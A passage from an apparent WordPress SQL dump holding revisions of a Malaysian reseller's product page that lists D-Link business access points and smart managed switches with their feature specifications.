Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:18:02','2019-09-25 07:18:02','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3425,1,'2019-09-25 15:18:48','2019-09-25 07:18:48','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high 